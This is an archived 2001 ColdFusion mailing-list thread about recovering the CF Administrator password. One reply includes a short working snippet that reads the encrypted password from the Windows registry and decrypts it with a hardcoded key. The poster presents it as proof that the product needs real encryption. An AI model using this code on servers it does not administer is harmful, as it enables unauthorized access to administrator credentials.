Re: Finding the CF Administrator password

Dain Anderson Fri, 09 Mar 2001 20:55:17 -0800
Todd,

It's very easy to retrieve the admin password, and I'm sure I will get
flamed for showing this, but what the hell:

<CFSET CFKey = "4p0L@r1$">

<CFREGISTRY ACTION=GET

Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server
"
      Entry="AdminPassword"
      Variable="AdminPassword">

<CFOUTPUT>
      Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
</CFOUTPUT>

The key to decrypt it spells "4 Polaris" (Allaire inside joke?) -- this
isn't my doing; rather, I was sent this from an anonymous source via the
[EMAIL PROTECTED] address. I hope this will show Allaire and ISPs that
there is a need for encryption, not encoding, for things such as this. I am
against template encryption personally, but the administrator feature should
have much better security. We live and learn, strive and yearn.

Dain Anderson
Caretaker, CF Comet
http://www.cfcomet.com/


----- Original Message -----
From: "Todd Ashworth" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, March 09, 2001 5:31 PM
Subject: Re: Finding the CF Administrator password


> Excellent.  What they are talking about looks likw what might be in the
> registry.  This might just do what I want.  If so, that's 2 I owe ya ;)
>
> Todd Ashworth --
> Web Application Developer
> Network Administrator
>
> Saber Corporation
> 314 Oakland Ave.
> Rock Hill, SC 29730
> (803) 327-0137 [111]
>
> ----- Original Message -----
> From: "Jon Hall" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Friday, March 09, 2001 5:22 PM
> Subject: Re: Finding the CF Administrator password
>
>
> | Check this link Todd.
> | http://www.fusionauthority.com/alert/index.cfm?alertid=6#Tech1
> |
> | There are undocumented "Administrator" functions called
> | CFusion_Encrypt()/CFusion_Decrypt.
> | These are probably the functions that were used to encrypt the string...
> |
> | jon
>
>
>
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
Re: Finding the CF Administrator password

Reply via email to
